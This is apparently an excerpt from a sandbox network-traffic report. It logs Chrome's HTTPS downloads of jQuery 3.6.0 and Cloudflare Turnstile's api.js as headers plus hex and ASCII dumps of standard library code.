                                                                        2025-01-16 08:20:18 UTC1369INData Raw: 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c
                                                                        Data Ascii: ]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        6192.168.2.549724151.101.2.1374433504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-16 08:20:18 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                        Host: code.jquery.com
                                                                        Connection: keep-alive
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                        Accept: */*
                                                                        Sec-Fetch-Site: none
                                                                        Sec-Fetch-Mode: cors
                                                                        Sec-Fetch-Dest: empty
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        2025-01-16 08:20:18 UTC613INHTTP/1.1 200 OK
                                                                        Connection: close
                                                                        Content-Length: 89501
                                                                        Server: nginx
                                                                        Content-Type: application/javascript; charset=utf-8
                                                                        Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                        ETag: "28feccc0-15d9d"
                                                                        Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                        Access-Control-Allow-Origin: *
                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                        Via: 1.1 varnish, 1.1 varnish
                                                                        Accept-Ranges: bytes
                                                                        Date: Thu, 16 Jan 2025 08:20:18 GMT
                                                                        Age: 2500145
                                                                        X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740033-EWR
                                                                        X-Cache: HIT, HIT
                                                                        X-Cache-Hits: 2774, 6
                                                                        X-Timer: S1737015619.745542,VS0,VE0
                                                                        Vary: Accept-Encoding
                                                                        2025-01-16 08:20:18 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                        Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                        2025-01-16 08:20:18 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                        Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                                        2025-01-16 08:20:18 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                                        Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                        2025-01-16 08:20:18 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                                        Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                        2025-01-16 08:20:18 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                        Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                                        2025-01-16 08:20:18 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                                        Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        7192.168.2.549725104.18.95.414433504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-16 08:20:19 UTC383OUTGET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1
                                                                        Host: challenges.cloudflare.com
                                                                        Connection: keep-alive
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                        Accept: */*
                                                                        Sec-Fetch-Site: none
                                                                        Sec-Fetch-Mode: cors
                                                                        Sec-Fetch-Dest: empty
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        2025-01-16 08:20:19 UTC471INHTTP/1.1 200 OK
                                                                        Date: Thu, 16 Jan 2025 08:20:19 GMT
                                                                        Content-Type: application/javascript; charset=UTF-8
                                                                        Content-Length: 47521
                                                                        Connection: close
                                                                        accept-ranges: bytes
                                                                        last-modified: Wed, 08 Jan 2025 13:42:47 GMT
                                                                        cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                        access-control-allow-origin: *
                                                                        cross-origin-resource-policy: cross-origin
                                                                        Server: cloudflare
                                                                        CF-RAY: 902caf840dae4309-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        2025-01-16 08:20:19 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                        Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                        2025-01-16 08:20:19 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                        Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                        2025-01-16 08:20:19 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                        Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                                        2025-01-16 08:20:19 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 58 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                        Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(fu
                                                                        2025-01-16 08:20:19 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                                        Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                                        2025-01-16 08:20:19 UTC1369INData Raw: 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 4b 74 3d 33 30 30 2c 24 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61
                                                                        Data Ascii: ecute"],e)}var Kt=300,$t=10;function yt(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clea
                                                                        2025-01-16 08:20:19 UTC1369INData Raw: 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 75 2c 67 3d 4d 28 4e 72 2c 28 75 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 75 21 3d 3d 76 6f 69 64 20 30 3f 75 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 68 2c 6c 3d 4d 28 6b 72 2c 28 68 3d 28 6e 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 6e 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64
                                                                        Data Ascii: innerWidth<400,c=e.state===Ie.FAILURE_FEEDBACK||e.state===Ie.FAILURE_HAVING_TROUBLES,u,g=M(Nr,(u=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&u!==void 0?u:"nonexistent"),h,l=M(kr,(h=(n=e.displayLanguage)===null||n===void 0?void
                                                                        2025-01-16 08:20:19 UTC1369INData Raw: 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 53 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 53 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79 28 68 2c 75 29 3b 76 61 72 20 6c 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 68 29 2c 70 3d 6e 65 77 20 6c 3b 72 65 74 75 72 6e 20 67 26 26 5a 28 70 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 70 7d 2c 53 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63
                                                                        Data Ascii: urn!1}}function Se(e,r,n){return je()?Se=Reflect.construct:Se=function(c,u,g){var h=[null];h.push.apply(h,u);var l=Function.bind.apply(c,h),p=new l;return g&&Z(p,g.prototype),p},Se.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Objec
                                                                        2025-01-16 08:20:19 UTC1369INData Raw: 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 73 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 48 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 48 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 51 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 48 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63
                                                                        Data Ascii: ");throw new sr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){return e.startsWith(He)?e.substring(He.length):null}function Q(e){return"".concat(He).concat(e)}function Rt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=doc
                                                                        2025-01-16 08:20:19 UTC1369INData Raw: 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b
                                                                        Data Ascii: rmOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        8192.168.2.549726104.18.94.414433504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        TimestampBytes transferredDirectionData
